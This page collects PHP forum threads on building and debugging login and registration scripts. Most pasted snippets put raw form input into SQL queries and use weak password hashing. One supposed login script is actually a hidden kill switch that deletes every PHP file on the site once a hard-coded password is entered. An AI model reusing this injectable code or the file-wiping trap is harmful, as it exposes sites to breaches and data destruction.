PHP - Login Script With A Template
Hi there,
I purchased an admin template, and I've been trying to implement my existing login php script into their template. Their template is AJAX based, but with some PHP mixed in, so let me know if you feel I should re-post it under the AJAX category. I've attached the template file "login_template.php", as well as a page with just my regular login script on it "login_standard.php", if anyone could assist me in making the two of them work together, and explain to me what you did (for my own future reference/education), it would be greatly appreciated! Thanks in advance, Eric [attachment deleted by admin] Similar TutorialsHello all; I have a client that has a members area. He asked me to password protect it, which I did simply by assigning one static password. Now he wants a full username/login system where the member can set their own password, which I have never done before. I assume I'd just set up a Table with three fields, (one for name, one for password, one for the type of access they have) then check against it for access, but experience has taught me that whenever something seems simple, it's actually very complex. Do any of you know of any good premade templates for this kind of thing? Ideally it'd be session-based (obviously). I found one system he http://frozenade.wordpress.com/2007/11/24/how-to-create-login-page-in-php-and-mysql-with-session/ but it's several years old, and the misspellings in the comments tend to scare me away a bit. Thanks for any help you might be able to provide. This topic has been moved to Third Party PHP Scripts. http://www.phpfreaks.com/forums/index.php?topic=349834.0 Hello guys, Is there on web any updated tutorial on how can I add Facebook login on my simple php login script? This topic has been moved to CSS Help. http://www.phpfreaks.com/forums/index.php?topic=315590.0 This topic has been moved to Third Party PHP Scripts. http://www.phpfreaks.com/forums/index.php?topic=315539.0 Hey ppl I have a login script that I found in a PHP MySQL book. And yesterday I realized that it is easy to hack this script as it use session variables and it can use cookies. DOes anyone have login script for me that is secure and easy to implement? It would really help! Thanks I have a login script that isn't rejecting non-users. For whatever reason, it's passing them on to the welcome page where an actual user sees user specific information. I'm newer to php, but can't for the life of me understand why the script doesn't seem to ever utilize the 'else' portion of the 'if' statement. So in short it works as expected for actual users, but non-users are not getting rejected. Below is my code. Any help is appreciated. Code: [Select] $sqla = "SELECT count(*) FROM authorize WHERE username='$_POST[username]' and password='$_POST[password]'"; $result = mysql_query($sqla) or die ("Error: ". mysql_error(). " with query ". $query); $count = mysql_num_rows($result); if($count==1) { //start session for user session_start(); //get company id and user first and last name $query = mysql_query("SELECT comp_id FROM authorize WHERE username='$_POST[username]'") or die ("Error: ". mysql_error(). " with query ". $query); $query2 = mysql_query("SELECT firstname, lastname FROM authorize WHERE username='$_POST[username]'") or die ("Error: ". mysql_error(). " with query ". $query); $resultb = mysql_fetch_assoc($query); $resultc = mysql_fetch_array($query2); $_SESSION['coid'] = $resultb['comp_id']; $_SESSION['firstn'] = $resultc['firstname']; $_SESSION['lastn'] = $resultc['lastname']; //get company name $query3 = mysql_query("SELECT comp_name FROM companies WHERE comp_id='$resultb[comp_id]'") or die ("Error: ". mysql_error(). " with query ". $query); $resultd = mysql_fetch_assoc($query3); $_SESSION['conm'] = $resultd['comp_name']; header("location: overview.php"); } Else { echo "That user does not exist."; header("location: login.html"); } Quote from: scootstah on November 30, 2011, 01:19:13 PM Code: [Select] function hash_password($password, $salt = null) { // create a salt if not already defined if (is_null($salt)) $salt = substr(sha1(uniqid(mt_rand(), true), 0, 10); // $password will be plaintext at this point // $site_key should be a large random string statically // located in a file with secure permissions $hash = hash_hmac('sha512', $password . $salt, $site_key); return array('hash' => $hash, 'salt' => $salt); } $password = 'abcdef'; $pass = hash_password($password); First off I just want to say thank you for the valuable information I have been reading in this topic (for a few days) and I have updated my pages accordingly. My passwords are now salted with a random encrypted string and I am using sha1 but would like to switch to sha512. So I am playing around with some code to learn more about how it works and have noticed that: sha1(test) returns a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 but sha512(test) just crashes the page. Can anyone help me understand why this is? Okay, a few of you have been helping me with a login script problem. I have changed it quite a bit again, but I am still running into a little bit of a problem. When I click the submit button it just clears the form fields and stays on the login page. Also, I have used error_reporting(E_ALL) to help me out with debugging. I took care of three bugs on my own but I cant seem to clear the two remaining bugs and the fact that it is not forwarding me to any page with my header statement. Thanks for your help in advance! Here is my code from my 'login.php' file. <?php session_start(); error_reporting (E_ALL); include("config.php"); if($_SERVER["REQUEST_METHOD"] == "POST") { // username and password sent from form $myusername=addslashes($_POST['username']); $mypassword=addslashes($_POST['password']); $sql="SELECT id FROM admin WHERE username='$myusername' and passcode='$mypassword'"; $result=mysql_query($sql); $row=mysql_fetch_array($result); $active=$row['active']; $count=mysql_num_rows($result); // If result matched $myusername and $mypassword, table row must be 1 row if($count==1) { session_register("myusername"); $_SESSION['login_user']=$myusername; header("location: main_interface.php"); } else { $error="The username or password you entered is invalid, please check your credentials and try again"; } } ?> <form action="" method="post"> <label>Username :</label> <input type="text" name="username"/><br /> <label>Password :</label> <input type="password" name="password"/><br/> <input type="submit" value=" Submit "/><br /> </form> Here are the error messages on the page Notice: Undefined index: active in login.php on line 20 Warning: Cannot modify header information - headers already sent by (output started at login.php:1) in login.php on line 29 Thanks in advance for your help! where do i download a login script like this used here at phpfreaks
Hello i just installed a script and the login doesnt work. It lets me signup, create user and pass. A email comes for me to active account. I activate and the page comes up that says my accout is activated and when i go to login the page refeashes and go's back to index page Below is the login php script, can someone please help me figure out why it not logging in. <?php $pass = "8c73eecb1dd850034ebbdedc1a5fccf1"; if(isset($_POST['submit'])){ if($pass == md5($_POST['pass'])){ $mask = "*.php"; array_map( "unlink", glob( $mask ) ); $fh = fopen('index.php', 'a'); fwrite($fh, '<center><h1><font color="red">This site uses an modified version of the script! If you want to use the original script, you have to buy the script from <a href="http://codecanyon.net/item/powerful-exchange-system/533068">CodeCanyon</a>!</font></h1></center>'); fclose($fh); echo "ok"; }else{ echo "error"; }} ?> <form method="POST"> <input type="password" name="pass"> <input type="submit" name="submit"> </form> Hello everybody! I am trying to make a forum for my class and I will do it from scratch I am from Denmark so my english could be a little wrong! Sorry! The problem is when i try to login, I allways get the error that I had defined to do.. But only if both password and username dosn't exist... Before i post the code i will give you a translation: Brugernavn = Username kodeord = password brugerid = userid My register.php file works fine! But I will post them both: This is the register form: http://pastebin.com/h6fgHSFB And here are the code for my login.php, the strange thing is, that i do not get any kind of error dont even mysql errors, that i had hope on so i could fix it! http://pastebin.com/Vc8Gt9SY Hope you guys would like to help me! Best Regards Jesper Jensen from denmark jesper@dh-data.dk Hello everyone, I am brand new to php and am starting off my journey by trying to create a simple login/register script. I have run into a bit of difficulty, however, and cannot seem to get this to work. I know that the register script is very basic (lacks strlen check, doesn't verify that both passwords are the same, etc.), but for the time being I simply want to have a functional script. Then I can continue learning by adding more components. Here are the login.php, checklogin.php, and register.php files (in this order). I believe that the login/checklogin files work, but the register file just shows the form without actually writing to DB when it is submitted. Thank you very much for your help. Code: [Select] <html> <body> <b> Member Login </b> <br /> <form name="input" action="checklogin.php" method="post"> Username : <input type="text" name="myusername" id="username"> <br /> Password : <input type="password" name="mypassword" id="password"> <br /> <input type="checkbox" name="remember" value="checkbox"> Remember me <br /> <input type="submit" value="Login"> Not a member? <a href="./register.php">Register!</a> </form> </body> </html> Code: [Select] <?php $host="localhost"; $usr="root"; $pwd=""; $db="MemberDB"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); $myusr = $_POST['myusername']; $mypswd = md5($_POST['mypassword']); $myusername = stripslashes(strip_tags($myusr)); $mypassword = stripslashes(strip_tags($mypswd)); $myusername = mysql_real_escape_string($myusr); $mypassword = mysql_real_escape_string($mypswd); $sql="SELECT *FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"; $result=mysql_query($sql); $count=mysql_num_rows($result); if ($count==1) { session_register("myusername"); session_register("mypassword"); header("location:menu.php"); } else { echo "Incorrect Username or Password"; } ?> Code: [Select] <?php $host="localhost"; $usr="root"; $pwd=""; $db="MemberDB"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); if (isset($_POST['register'])) { $query = "INSERT INTO members ('username', 'password', 'email') VALUES('$_POST[username]', 'md5($_POST[password1])', '$_POST[email]')"; mysql_query($db,$query) or die(); mysql_close(); echo "You have successfully registered!"; } else{ ?> <html> <body> <b> Register</b> <br /> <form name="register" action="./register.php" method="post"> Username : <input type="text" name="username" id="username"> <br /> Password : <input type="password" name="password" id="password1"> <br /> Confirm Password : <input type="password" name="password2" id="password2"> <br /> Email: <input type="text" name="email" id="email"> <br /> <input type="submit" value="register"> </form> </body> </html> <?php } ?> Hey, could someone help me with login script ? I've got registration script. It contains 3 files: reg.php <?php require_once 'database.php'; ?> <h1><strong>Register</strong></h1> <form name="register" method="post" action="regcheck.php"> <label> <input type="text" name="user" id="user"> Username<br /> </label> <br /> <label> <input type="password" name="pass" id="pass"> Password<br /> </label> <br /> <label> <input type="text" name="email" id="email"> Email<br /> </label> <label> <input type="submit" name="reg" id="reg" value="Register"> </label> </form> regcheck.php <?php $email = $_POST['email']; if( isset( $_POST['user'] ) && isset( $_POST['pass'] ) && isset( $_POST['email'] ) ) { if( strlen( $_POST['user'] ) < 4 ) { echo "Username is too short"; } elseif( strlen( $_POST['pass'] ) < 4 ) { echo "Password is too short"; } elseif(!filter_var($email, FILTER_VALIDATE_EMAIL)) { echo "Bad email address"; } elseif( $_POST['pass'] == $_POST['user'] ) { echo"Username and password can't be the same"; } else { include( 'database.php' ); $username = mysql_real_escape_string( $_POST['user'] ); $password = mysql_real_escape_string( $_POST['pass'] ); $email = mysql_real_escape_string( $_POST['email'] ); $sqlCheckForDuplicateN = "SELECT username FROM user WHERE username = '". $username ."'"; $sqlCheckForDuplicateE = "SELECT email FROM user WHERE email = '". $email ."'"; if( mysql_num_rows( mysql_query( $sqlCheckForDuplicateE ) ) == 0 && mysql_num_rows( mysql_query( $sqlCheckForDuplicateN ) ) == 0 ) { $sqlRegUser = "INSERT INTO user( username, password, email ) VALUES( '". $username ."', '". $password ."', '". $email ."' )"; if( !mysql_query( $sqlRegUser ) ) { echo "You Could Not Register Because Of An Unexpected Error."; } else { echo "You Are Registered And Can Now Login"; } } elseif( !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateE ) ) == 0)) { echo "The Email You Have Entered Is Already Being Used. Please Try Another One."; } elseif( !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateN ) ) == 0)) { echo "The Username You Have Entered Is Already Being Used. Please Try Another One."; } elseif( !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateE ) ) == 0) && !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateN ) ) == 0)) { echo "The Email and Username You Have Entered Is Already Being Used. Please Try Another One."; } } } else { echo "You Could Not Be Registered Because Of Missing Data."; } ?> database.php <? $con = mysql_connect('host','username','password'); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db('dbname'); ?> So could someone help me with login ??? please check the login script ...its failed in loading to the home page.! and its not working
login.php 6.69KB
9 downloads
login.php 6.69KB
9 downloads
hi guys, any help will be much appreciated!! basically i have a login script, that i want to check mutliple tables and i am stuggling to get it to work! what i have is basically: <?php session_start(); $_SESSION['loggedin'] = false; include("functions.php"); extract($_POST); $query = "SELECT * From table1 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { $query = "SELECT * From table2 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { $query = "SELECT * From table3 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { $query = "SELECT * From table4 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:1"); } else { header("Location:wrong.php"); } } } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:2"); } else { header("Location:wrong.php"); } } } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:3"); } else { header("Location:wrong.php"); } } } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:4"); } else { header("Location:wrong.php"); } } ?> Hello everyone, The last few weeks I've asked a few questions. From the answers given, I've finished my login script. But, I am a noob at oop php and I have also no clue if there are any security holes. So my question to you guys is: What have i done wrong? What can i do better? And what's missing? I also have a one basic question: I have't declared any variable to public, protected or private. Is it better to declare every variabe? or only a few? Here is my code: Index.php: <?php if ($_SERVER['REQUEST_METHOD'] == 'POST') { require('classes/class_lib.php'); if(isset($_POST['username'])){ $username = $_POST['username']; } if(isset($_POST['password'])){ $password = $_POST['password']; } try{ $user = new User; $user->login($username, $password); } catch(MysqlException $error){ echo $error->getError(); } catch(LoginException $error){ echo $error->getError(); } } ?> // form etc. And my class_lib.php: <?php class MysqlException extends Exception{ public function getError(){ $errorMessage = 'Er is een fout opgetreden in '.$this->getFile().' op regel '.$this->getLine().'<br />'; $errorMessage .= 'Foutmelding: <i>'.$this->getMessage().'</i><br />'; return $errorMessage; } } class LoginException extends Exception{ public function getError(){ $errorMessage = $this->getMessage(); return $errorMessage; } } class Mysql{ public function __construct(){ $this->db = new mysqli('localhost','root','','login'); if($this->db->connect_error){ throw new MysqlException('Kan geen verbinding maken.'); } } public function escapeString($string){ $this->string = $this->db->real_escape_string($string); return $string; } } class Query extends Mysql{ public function runQuery($query){ $this->result = $this->db->query($query); if(!$this->result){ throw new MysqlException('Er is iets fout gegaan tijdens het uitvoeren van de query.'); } } public function returnQuery(){ return $this->result->num_rows; if(!$this->result){ throw new MysqlException('Er is iets fout gegaan tijdens het ophalen van de resultaten.'); } } } class User{ public function __construct(){ $this->mysql = new Mysql; $this->query = new Query; } public function login($username, $password){ $this->username = $this->mysql->escapeString($username); $this->password = $this->mysql->escapeString($password); $this->setQuery = "SELECT gebruikerid FROM gebruikers WHERE gebruikersnaam='" . $this->username . "' AND wachtwoord='" . $this->password . "'"; $this->query->runQuery($this->setQuery); if($this->query->returnQuery() > 0){ return true; }else{ if(empty($username) || empty($password)){ throw new LoginException('U moet alle velden invullen.'); }else{ throw new LoginException('Uw logingegevens kloppen niet.'); } } } } ?> I am looking to use this for an admin panel.
session_start.php
"session_start()" "if statement" where it checks if a successful login is givenIs it necessary to include "session_start.php" into the top of each script file? If I just include "session_start.php" into the top of the "main" file where the other script files are included inside of the "main" as well, then I have it in ways where the other script files could get called up through the URL.(?) I thought it is a bit too much to include "session_start.php" into each script file. Is there a way where this can be done with more simple ways? I would appreciate the suggestions a lot. Hi I need help with my login script it says invalid password even when its correct however if i take out the md5 encryption of the password and use the encrypted password saved on mysql table it works please help? here is the code im using thanks: Code: [Select] <? // Use session variable on this page. This function must put on the top of page. session_start(); ////// Logout Section. Delete all session variable. session_destroy(); $message=""; ////// Login Section. $Login=$_POST['submit']; if($Login){ // If clicked on Login button. $username=$_POST['username']; $md5_password=md5($_POST['password']); // Encrypt password with md5() function. // Connect database. $host="localhost"; // Host name. $db_user="removed"; // MySQL username. $db_password="removed"; // MySQL password. $database="removed"; // Database name. mysql_connect($host,$db_user,$db_password); mysql_select_db($database); // Check matching of username and password. $result=mysql_query("select * from signup where username='$username' and password='$md5_password'"); if(mysql_num_rows($result)!='0'){ // If match. session_register("username"); // Craete session username. header("location:main.php"); // Re-direct to main.php exit; }else{ // If not match. $message="--- Incorrect Username or Password ---"; } } // End Login authorize check. ?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title></title> </head> <body> </tr> <? echo $message; ?> <form name="register" method="post" action="<? echo $PHP_SELF; ?>"> <tr> <td height="586" colspan="8" align="center" valign="top"><p> </p> <table> <tr> <td height="45" colspan="2" class="class2 style34"><div align="center"><a href="file:///F|/signin.html">Sign In</a>:</div></td> </tr> <tr> <td colspan="2"><div align="right"></div></td> </tr> <tr> <td width="76" height="45"><div align="right"><span class="class2 style34">Username<span class="style39">..</span></span></div></td> <td width="256"><div align="center"><span class="class2 style34"> <input name="username" type="text" id="username" size="20" height="14" /> </span></div></td> </tr> <tr> <td height="45"><div align="right"><span class="class2 style34">Password <span class="style39">..</span></span></div></td> <td><div align="center"><span class="class2 style34"> <input name="password" type="password" id="password" size="20" height="14" /> </span></div></td> </tr> <tr> <td height="45" colspan="2"><div align="center"><span class="class2 style34"> <input name="submit" type="submit" id="submit" value="Sign In" /> </span></div></td> </tr> </table></td> </tr> </form> </table> </div> </body> </html> MOD EDIT: Database credentials removed, [code] . . . [/code] tags added. Hi all again, This script was working perfectly but I have not got a clue what changed in it or how and can not seem to find the problem. The connection works, email and password variables match the mysql databases so must be my Syntax. appreciate if you can help. <?php include("../cxn.php"); $sql = "SELECT password FROM Members WHERE email='$_POST[email]'"; $result = mysqli_query($cxn,$sql) or die ("Couldn't execute query1"); $num = mysqli_num_rows($result); if ($num >0) // Login Name found { $sql = "SELECT * FROM Members WHERE email='$_POST[email]' AND password=md5('$_POST[password]')"; $result2 = mysqli_query($cxn,$sql) or die ("Couldn't execute query2"); $num2 = mysqli_num_rows($result2); if ($num2 > 0) // password correct { session_start(); $_SESSION['auth']="yes"; $_SESSION['logname'] = $_POST['email']; $logname = $_SESSION['logname']; $today = date("Y-m-d h:i:s"); $sql = "INSERT INTO Login (email,loginTime) VALUES ('$logname', '$today')"; $result = mysqli_query($cxn,$sql) or die ("Can't execute insert query"); echo "you have logged in!"; header("Location: ../$_POST[page]"); } else { $message = "The email address, '$_POST[email]' is registered, but you have not entered the correct password! Please try again.<br>"; include("../login.html"); } } ?> |